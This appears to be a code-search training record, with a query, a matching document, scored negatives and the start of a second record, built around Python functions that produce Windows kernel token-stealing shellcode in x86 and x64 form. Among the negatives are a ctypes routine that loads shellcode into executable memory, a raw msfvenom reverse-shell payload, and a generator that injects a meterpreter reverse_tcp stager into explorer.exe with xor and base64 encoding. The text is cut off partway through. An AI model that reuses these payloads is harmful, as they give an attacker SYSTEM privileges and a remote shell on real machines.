def tokenstealingx86(RETVAL, extra = ""): (KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86() shellcode = ( "\x60" # pushad "\x33\xc0" # xor eax,eax "\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124] "\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS] "\x8b\xc8" # mov ecx,eax "\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+0xb8] "\x2d" + APLINKS + "\x00\x00\x00" # sub eax,0xb8 "\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+0xb4],0x4 "\x75\xec" # jne 0xe "\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+0xf8] "\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+0xf8],edx "\x61" # popad ) shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack if RETVAL == "": shellcode += "\xc3" #retn else: shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 return shellcode
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tokenstealingx64(RETVAL, extra = \"\"):\n\t(KPROCESS,FLINK,UPID,TOKEN) = setosvariablesx64()\n\tshellcode = (\n\t\"\\x65\\x48\\x8b\\x04\\x25\\x88\\x01\\x00\\x00\"\t\t# mov rax, [gs:0x188] ;Get current ETHREAD in\n\t\"\\x48\\x8b\\x40\" + KPROCESS +\t\t\t\t\t# mov rax, [rax+0x68] ;Get current KPROCESS address\n\t\"\\x48\\x89\\xc1\"\t\t\t\t\t\t\t\t# mov rcx, rax ;Copy current KPROCESS address to RCX\n\t\"\\x48\\x8b\\x80\" + FLINK + \"\\x00\\x00\"\t\t\t# mov rax, [rax+0xe0] ;Next KPROCESS ActivKPROCESSLinks.Flink\n\t\"\\x48\\x2d\" + FLINK + \"\\x00\\x00\"\t\t\t\t# sub rax, 0xe0 ;Go to the beginning of the KPROCESS structure\n\t\"\\x4c\\x8b\\x88\" + UPID + \"\\x00\\x00\"\t\t\t# mov r9 , [rax+0xd8] ;Copy PID to R9\n\t\"\\x49\\x83\\xf9\\x04\"\t\t\t\t\t\t\t# cmp r9 , 0x4 ;Compare R9 to SYSTEM PID (=4)\n\t\"\\x75\\xe6\"\t\t\t\t\t\t\t\t\t# jnz short find_system_process ;If not SYSTEM got to next KPROCESS\n\t\"\\x48\\x8b\\x90\" + TOKEN + \"\\x00\\x00\"\t\t\t# mov rdx, [rax+0x160] ;Copy SYSTEM process token address to RDX\n\t\"\\x48\\x89\\x91\" + TOKEN + \"\\x00\\x00\"\t\t\t# mov [rcx+0x160], rdx ;Steal token with overwriting our current process's token address\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def restoretokenx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x52\"\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\x15\\x00\\x09\\x02\\x00\"\n\t\"\\x89\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x5a\"\n\t)\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def getToken():\n token = getenv(TOKEN_NAME)\n if token == None:\n raise SystemExit('No token found. Use env variable %s' % TOKEN_NAME)\n return token", "def _ret_shellcode_buffer():\n\n shellcode = bytearray(\n #---[Debug]\n \"\\xCC\"\n #---[Setup]\n \"\\x60\" # pushad\n \"\\x64\\xA1\\x24\\x01\\x00\\x00\" \t # mov eax, fs:[KTHREAD_OFFSET]\n \"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]\n \"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)\n \"\\x8B\\x98\\xF8\\x00\\x00\\x00\" \t # mov ebx, [eax + TOKEN_OFFSET]\n #---[Copy System PID token]\n \"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)\n \"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET] <-|\n \"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET |\n \"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx |\n \"\\x75\\xED\" # jnz ->|\n \"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]\n \"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx\n #---[Recover]\n \"\\x61\" # popad\t\t\n \"\\xC3\" # ret\n )\n\n MEM_COMMIT_MEM_RESERVE = 0x3000\n PAGE_EXECUTE_READWRITE = 0x40\n\t\n ptr = kernel32.VirtualAlloc(\n c_int(0), # lpAddress\n c_int(len(shellcode)), # dwSize\n c_int(MEM_COMMIT_MEM_RESERVE), # flAllocationType\n c_int(PAGE_EXECUTE_READWRITE) # flProtect\n )\n \n shellcode_ptr = (c_char * len(shellcode)).from_buffer(shellcode)\n\n kernel32.RtlMoveMemory(\n c_int(ptr),\n shellcode_ptr,\n c_int(len(shellcode))\n )\n \n return ptr, len(shellcode)", "def token():\n return os.environ.get('TOKEN', None)", "def token(command, hostname):\n communicator = ClickCallback()\n token_command().with_communicator(communicator).build().execute(command=command, hostname=hostname)", "def get(self):\r\n # Update of 0.3.6\r\n # Some custom shells will not need TARGET and PORT strings.\r\n # To deal with that, I will just try to find them in the string first.\r\n if \"TARGET\" in self.code and \"PORT\" in self.code:\r\n self.code = str(self.code.replace(\"TARGET\", self.host)).replace(\"PORT\", str(self.port))\r\n else:\r\n # Custom shell. Here we need to program individually based in specifics.\r\n if \"bloodseeker\" in self.name.lower(): # This is for Bloodseeker project.\r\n \r\n # This one requires a stager.\r\n if self.args.stager is None:\r\n print(error(\"This payload REQUIRES --stager flag.\"))\r\n exit(1)\r\n \r\n print(info(\"Generating shellcode ...\"))\r\n malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode(\"base64\")).replace(\"SHELLCODEHERE\", shellcode_to_ps1(\"windows/x64/meterpreter/reverse_tcp\", self.args.host, self.args.port))\r\n self.code = malicious_script.replace(\"PROCESSNAME\", \"explorer\") # we want inject into explorer.exe\r\n print(alert(\"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.\"))\r\n print(alert(\"It is recommended to use the --base64 flag.\"))\r\n return self.code # we dont need encoder in this one.\r\n else:\r\n print(error(\"No custom shell procedure was arranged for this shell. This is fatal.\"))\r\n exit(1)\r\n\r\n \r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply URL-encoding\r\n if self.args.urlencode is True and self.args.stager is None:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code", "def get_process_token():\n # Reference\n # https://gist.github.com/schlamar/7024668\n GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess\n GetCurrentProcess.restype = wintypes.HANDLE\n OpenProcessToken = ctypes.windll.advapi32.OpenProcessToken\n OpenProcessToken.argtypes = (wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE))\n OpenProcessToken.restype = wintypes.BOOL\n token = wintypes.HANDLE()\n\n # https://github.com/Alexpux/mingw-w64/blob/master/mingw-w64-tools/widl/include/winnt.h\n # TOKEN_READ = STANDARD_RIGHTS_READ | TOKEN_QUERY = 0x00020000 | 0x0008 = 0x20008\n # TOKEN_ALL_ACCESS = 0xf01ff\n\n TOKEN_READ = 0x20008\n res = OpenProcessToken(GetCurrentProcess(), TOKEN_READ, token)\n if not res > 0:\n raise RuntimeError(\"Couldn't get process token\")\n return token", "def token(self) -> str:", "def read_token(self):\n self._skip_white_space()\n return self._get_token()", "def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode", "def token(self):\n return self[\"token\"]", "def token(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"token\")", "def _get_token(self) -> str:\n if IS_SUPERVISOR:\n # On supervisor installs the token is provided by a environment variable\n return os.environ[\"HASSIO_TOKEN\"]\n return self._token", "def token(self):\r\n return self._token", "def get_token(self):\n return self.__token", "def get_token(self):\n return self.__token", "def getToken(self):\n \n raise NotImplementedError", "def _set_token(self):\n f = open(\".cli_token\")\n data = f.read()\n if data is not None:\n self.token = data\n return self.token", "def get_token(self):\n self.send_cmd(\"support-account status\")\n index = self.cli.expect(['Enabled', 'Disabled'])\n if index == 1:\n self.send_cmd(\"support-account enable\")\n self.send_cmd(\"support-account status\", expected_value='Support account status: Enabled')\n\n # required to fill pexpect buffer with string containing the token\n get_token_line_re = \"token.*\"\n get_token_re = \"token:\\s(.{8})\"\n\n self.expect(get_token_line_re)\n token = re.search(get_token_re, self.cli.after).group(1)\n PrintMessage(\"Token value: {0}\".format(token))\n\n return token", "def token(self):\n print(\"getter of token called\")\n return self._token", "def get_token():\n return session.get('microsoft_token')", "def get_token():\n return session.get('microsoft_token')", "def get_token(self, *args, **kwargs):\n if \"SHIB-ECP\" == self._auth_mode:\n return self._shib_get_token(*args, **kwargs)\n elif \"MAST-AUTH\" == self._auth_mode:\n return self._get_token(*args, **kwargs)\n else:\n raise Exception(\"Unknown MAST Auth mode %s\" % self._auth_mode)", "def _get_code_command_linux():\n print('Use arrows (or \\'E\\', \\'S\\', \\'W\\',' +\\\n '\\'N\\' + a number) to move or \\'q\\' to give up.')\n return get_char_code.get()", "def token(self):\n return self._token", "def token(self):\n return self._token", "def token(self):\n return self._token", "def step_impl(context):\n fields = {\n 'grant_type': 'authorization_code',\n 'code': context.code,\n 'client_id': context.vendor_config['auth']['client_id'],\n 'redirect_uri': context.vendor_config['auth']['redirect_uri'],\n }\n\n context.response = token_request(fields,\n context.vendor_config['auth'],\n context.conformance)", "def _handle_token(self, token: str) -> Optional[str]:\n return token" ]
[ "0.70278656", "0.650703", "0.6274305", "0.6186978", "0.6176795", "0.6083142", "0.6050683", "0.59221244", "0.5876762", "0.58669776", "0.5856236", "0.5835206", "0.5827853", "0.58036566", "0.5737415", "0.5736564", "0.5736564", "0.5728309", "0.57101184", "0.56970257", "0.5681948", "0.5680685", "0.5680685", "0.5659311", "0.56415546", "0.56004554", "0.56004554", "0.56004554", "0.55629593", "0.55618346" ]
0.7076698
0
Retrun a token stealing shellcode related to the platform
def tokenstealingx64(RETVAL, extra = ""): (KPROCESS,FLINK,UPID,TOKEN) = setosvariablesx64() shellcode = ( "\x65\x48\x8b\x04\x25\x88\x01\x00\x00" # mov rax, [gs:0x188] ;Get current ETHREAD in "\x48\x8b\x40" + KPROCESS + # mov rax, [rax+0x68] ;Get current KPROCESS address "\x48\x89\xc1" # mov rcx, rax ;Copy current KPROCESS address to RCX "\x48\x8b\x80" + FLINK + "\x00\x00" # mov rax, [rax+0xe0] ;Next KPROCESS ActivKPROCESSLinks.Flink "\x48\x2d" + FLINK + "\x00\x00" # sub rax, 0xe0 ;Go to the beginning of the KPROCESS structure "\x4c\x8b\x88" + UPID + "\x00\x00" # mov r9 , [rax+0xd8] ;Copy PID to R9 "\x49\x83\xf9\x04" # cmp r9 , 0x4 ;Compare R9 to SYSTEM PID (=4) "\x75\xe6" # jnz short find_system_process ;If not SYSTEM got to next KPROCESS "\x48\x8b\x90" + TOKEN + "\x00\x00" # mov rdx, [rax+0x160] ;Copy SYSTEM process token address to RDX "\x48\x89\x91" + TOKEN + "\x00\x00" # mov [rcx+0x160], rdx ;Steal token with overwriting our current process's token address ) shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack if RETVAL == "": shellcode += "\xc3" #retn else: shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8 return shellcode
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tokenstealingx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x60\"\t\t\t\t\t\t\t\t\t\t# pushad\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\xc8\"\t\t\t\t\t\t\t\t\t# mov\tecx,eax\n\t\"\\x8b\\x80\" + APLINKS + \"\\x00\\x00\\x00\"\t\t# mov\teax,DWORD PTR [eax+0xb8]\n\t\"\\x2d\" + APLINKS + \"\\x00\\x00\\x00\"\t\t\t# sub\teax,0xb8\n\t\"\\x83\\xb8\" + UPID + \"\\x00\\x00\\x00\\x04\"\t\t# cmp\tDWORD PTR [eax+0xb4],0x4\n\t\"\\x75\\xec\"\t\t\t\t\t\t\t\t\t# jne\t0xe\n\t\"\\x8b\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x89\\x91\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tDWORD PTR [ecx+0xf8],edx\n\t\"\\x61\"\t\t\t\t\t\t\t\t\t\t# popad\n\t)\n\t\n\tshellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def restoretokenx86(RETVAL, extra = \"\"):\n\t(KPROCESS,APLINKS,UPID,TOKEN) = setosvariablesx86()\n\tshellcode = (\n\t\"\\x52\"\n\t\"\\x33\\xc0\"\t\t\t\t\t\t\t\t\t# xor\teax,eax\n\t\"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"\t\t\t\t# mov\teax,DWORD PTR fs:[eax+0x124]\n\t\"\\x8b\\x40\" + KPROCESS +\t\t\t\t\t# mov\teax,DWORD PTR [eax+_KPROCESS]\n\t\"\\x8b\\x15\\x00\\x09\\x02\\x00\"\n\t\"\\x89\\x90\" + TOKEN + \"\\x00\\x00\\x00\"\t\t\t# mov\tedx,DWORD PTR [eax+0xf8]\n\t\"\\x5a\"\n\t)\n\t\n\tif RETVAL == \"\":\n\t\tshellcode += \"\\xc3\"\t\t\t\t\t\t#retn\n\telse:\n\t\tshellcode += \"\\xc2\" + RETVAL + \"\\x00\"\t# ret\t0x8\t\n\t\n\treturn shellcode", "def getToken():\n token = getenv(TOKEN_NAME)\n if token == None:\n raise SystemExit('No token found. Use env variable %s' % TOKEN_NAME)\n return token", "def _ret_shellcode_buffer():\n\n shellcode = bytearray(\n #---[Debug]\n \"\\xCC\"\n #---[Setup]\n \"\\x60\" # pushad\n \"\\x64\\xA1\\x24\\x01\\x00\\x00\" \t # mov eax, fs:[KTHREAD_OFFSET]\n \"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]\n \"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)\n \"\\x8B\\x98\\xF8\\x00\\x00\\x00\" \t # mov ebx, [eax + TOKEN_OFFSET]\n #---[Copy System PID token]\n \"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)\n \"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET] <-|\n \"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET |\n \"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx |\n \"\\x75\\xED\" # jnz ->|\n \"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]\n \"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx\n #---[Recover]\n \"\\x61\" # popad\t\t\n \"\\xC3\" # ret\n )\n\n MEM_COMMIT_MEM_RESERVE = 0x3000\n PAGE_EXECUTE_READWRITE = 0x40\n\t\n ptr = kernel32.VirtualAlloc(\n c_int(0), # lpAddress\n c_int(len(shellcode)), # dwSize\n c_int(MEM_COMMIT_MEM_RESERVE), # flAllocationType\n c_int(PAGE_EXECUTE_READWRITE) # flProtect\n )\n \n shellcode_ptr = (c_char * len(shellcode)).from_buffer(shellcode)\n\n kernel32.RtlMoveMemory(\n c_int(ptr),\n shellcode_ptr,\n c_int(len(shellcode))\n )\n \n return ptr, len(shellcode)", "def token():\n return os.environ.get('TOKEN', None)", "def token(command, hostname):\n communicator = ClickCallback()\n token_command().with_communicator(communicator).build().execute(command=command, hostname=hostname)", "def get(self):\r\n # Update of 0.3.6\r\n # Some custom shells will not need TARGET and PORT strings.\r\n # To deal with that, I will just try to find them in the string first.\r\n if \"TARGET\" in self.code and \"PORT\" in self.code:\r\n self.code = str(self.code.replace(\"TARGET\", self.host)).replace(\"PORT\", str(self.port))\r\n else:\r\n # Custom shell. Here we need to program individually based in specifics.\r\n if \"bloodseeker\" in self.name.lower(): # This is for Bloodseeker project.\r\n \r\n # This one requires a stager.\r\n if self.args.stager is None:\r\n print(error(\"This payload REQUIRES --stager flag.\"))\r\n exit(1)\r\n \r\n print(info(\"Generating shellcode ...\"))\r\n malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode(\"base64\")).replace(\"SHELLCODEHERE\", shellcode_to_ps1(\"windows/x64/meterpreter/reverse_tcp\", self.args.host, self.args.port))\r\n self.code = malicious_script.replace(\"PROCESSNAME\", \"explorer\") # we want inject into explorer.exe\r\n print(alert(\"Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine.\"))\r\n print(alert(\"It is recommended to use the --base64 flag.\"))\r\n return self.code # we dont need encoder in this one.\r\n else:\r\n print(error(\"No custom shell procedure was arranged for this shell. This is fatal.\"))\r\n exit(1)\r\n\r\n \r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply URL-encoding\r\n if self.args.urlencode is True and self.args.stager is None:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code", "def get_process_token():\n # Reference\n # https://gist.github.com/schlamar/7024668\n GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess\n GetCurrentProcess.restype = wintypes.HANDLE\n OpenProcessToken = ctypes.windll.advapi32.OpenProcessToken\n OpenProcessToken.argtypes = (wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE))\n OpenProcessToken.restype = wintypes.BOOL\n token = wintypes.HANDLE()\n\n # https://github.com/Alexpux/mingw-w64/blob/master/mingw-w64-tools/widl/include/winnt.h\n # TOKEN_READ = STANDARD_RIGHTS_READ | TOKEN_QUERY = 0x00020000 | 0x0008 = 0x20008\n # TOKEN_ALL_ACCESS = 0xf01ff\n\n TOKEN_READ = 0x20008\n res = OpenProcessToken(GetCurrentProcess(), TOKEN_READ, token)\n if not res > 0:\n raise RuntimeError(\"Couldn't get process token\")\n return token", "def token(self) -> str:", "def read_token(self):\n self._skip_white_space()\n return self._get_token()", "def add_shellcode() -> bytes:\n # msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread lhost=eth0 lport=4444 \n # -f c -b \"\\x00\\x20\\x25\\x2b\\x2f\\x5c\"\n #Payload size: 351 bytes\n shellcode = b\"\"\n shellcode += b\"\\xba\\x6e\\x70\\x53\\xc6\\xdb\\xc4\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1\"\n shellcode += b\"\\x52\\x31\\x56\\x12\\x03\\x56\\x12\\x83\\xa8\\x74\\xb1\\x33\\xc8\\x9d\\xb7\"\n shellcode += b\"\\xbc\\x30\\x5e\\xd8\\x35\\xd5\\x6f\\xd8\\x22\\x9e\\xc0\\xe8\\x21\\xf2\\xec\"\n shellcode += b\"\\x83\\x64\\xe6\\x67\\xe1\\xa0\\x09\\xcf\\x4c\\x97\\x24\\xd0\\xfd\\xeb\\x27\"\n shellcode += b\"\\x52\\xfc\\x3f\\x87\\x6b\\xcf\\x4d\\xc6\\xac\\x32\\xbf\\x9a\\x65\\x38\\x12\"\n shellcode += b\"\\x0a\\x01\\x74\\xaf\\xa1\\x59\\x98\\xb7\\x56\\x29\\x9b\\x96\\xc9\\x21\\xc2\"\n shellcode += b\"\\x38\\xe8\\xe6\\x7e\\x71\\xf2\\xeb\\xbb\\xcb\\x89\\xd8\\x30\\xca\\x5b\\x11\"\n shellcode += b\"\\xb8\\x61\\xa2\\x9d\\x4b\\x7b\\xe3\\x1a\\xb4\\x0e\\x1d\\x59\\x49\\x09\\xda\"\n shellcode += b\"\\x23\\x95\\x9c\\xf8\\x84\\x5e\\x06\\x24\\x34\\xb2\\xd1\\xaf\\x3a\\x7f\\x95\"\n shellcode += b\"\\xf7\\x5e\\x7e\\x7a\\x8c\\x5b\\x0b\\x7d\\x42\\xea\\x4f\\x5a\\x46\\xb6\\x14\"\n shellcode += b\"\\xc3\\xdf\\x12\\xfa\\xfc\\x3f\\xfd\\xa3\\x58\\x34\\x10\\xb7\\xd0\\x17\\x7d\"\n shellcode += b\"\\x74\\xd9\\xa7\\x7d\\x12\\x6a\\xd4\\x4f\\xbd\\xc0\\x72\\xfc\\x36\\xcf\\x85\"\n shellcode += b\"\\x03\\x6d\\xb7\\x19\\xfa\\x8e\\xc8\\x30\\x39\\xda\\x98\\x2a\\xe8\\x63\\x73\"\n shellcode += b\"\\xaa\\x15\\xb6\\xd4\\xfa\\xb9\\x69\\x95\\xaa\\x79\\xda\\x7d\\xa0\\x75\\x05\"\n shellcode += b\"\\x9d\\xcb\\x5f\\x2e\\x34\\x36\\x08\\x91\\x61\\x5b\\xab\\x79\\x70\\x9b\\x3a\"\n shellcode += b\"\\x26\\xfd\\x7d\\x56\\xc6\\xab\\xd6\\xcf\\x7f\\xf6\\xac\\x6e\\x7f\\x2c\\xc9\"\n shellcode += b\"\\xb1\\x0b\\xc3\\x2e\\x7f\\xfc\\xae\\x3c\\xe8\\x0c\\xe5\\x1e\\xbf\\x13\\xd3\"\n shellcode += b\"\\x36\\x23\\x81\\xb8\\xc6\\x2a\\xba\\x16\\x91\\x7b\\x0c\\x6f\\x77\\x96\\x37\"\n shellcode += b\"\\xd9\\x65\\x6b\\xa1\\x22\\x2d\\xb0\\x12\\xac\\xac\\x35\\x2e\\x8a\\xbe\\x83\"\n shellcode += b\"\\xaf\\x96\\xea\\x5b\\xe6\\x40\\x44\\x1a\\x50\\x23\\x3e\\xf4\\x0f\\xed\\xd6\"\n shellcode += b\"\\x81\\x63\\x2e\\xa0\\x8d\\xa9\\xd8\\x4c\\x3f\\x04\\x9d\\x73\\xf0\\xc0\\x29\"\n shellcode += b\"\\x0c\\xec\\x70\\xd5\\xc7\\xb4\\x91\\x34\\xcd\\xc0\\x39\\xe1\\x84\\x68\\x24\"\n shellcode += b\"\\x12\\x73\\xae\\x51\\x91\\x71\\x4f\\xa6\\x89\\xf0\\x4a\\xe2\\x0d\\xe9\\x26\"\n shellcode += b\"\\x7b\\xf8\\x0d\\x94\\x7c\\x29\"\n return shellcode", "def token(self):\n return self[\"token\"]", "def token(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"token\")", "def _get_token(self) -> str:\n if IS_SUPERVISOR:\n # On supervisor installs the token is provided by a environment variable\n return os.environ[\"HASSIO_TOKEN\"]\n return self._token", "def token(self):\r\n return self._token", "def get_token(self):\n return self.__token", "def get_token(self):\n return self.__token", "def getToken(self):\n \n raise NotImplementedError", "def _set_token(self):\n f = open(\".cli_token\")\n data = f.read()\n if data is not None:\n self.token = data\n return self.token", "def get_token(self):\n self.send_cmd(\"support-account status\")\n index = self.cli.expect(['Enabled', 'Disabled'])\n if index == 1:\n self.send_cmd(\"support-account enable\")\n self.send_cmd(\"support-account status\", expected_value='Support account status: Enabled')\n\n # required to fill pexpect buffer with string containing the token\n get_token_line_re = \"token.*\"\n get_token_re = \"token:\\s(.{8})\"\n\n self.expect(get_token_line_re)\n token = re.search(get_token_re, self.cli.after).group(1)\n PrintMessage(\"Token value: {0}\".format(token))\n\n return token", "def get_token():\n return session.get('microsoft_token')", "def get_token():\n return session.get('microsoft_token')", "def token(self):\n print(\"getter of token called\")\n return self._token", "def get_token(self, *args, **kwargs):\n if \"SHIB-ECP\" == self._auth_mode:\n return self._shib_get_token(*args, **kwargs)\n elif \"MAST-AUTH\" == self._auth_mode:\n return self._get_token(*args, **kwargs)\n else:\n raise Exception(\"Unknown MAST Auth mode %s\" % self._auth_mode)", "def _get_code_command_linux():\n print('Use arrows (or \\'E\\', \\'S\\', \\'W\\',' +\\\n 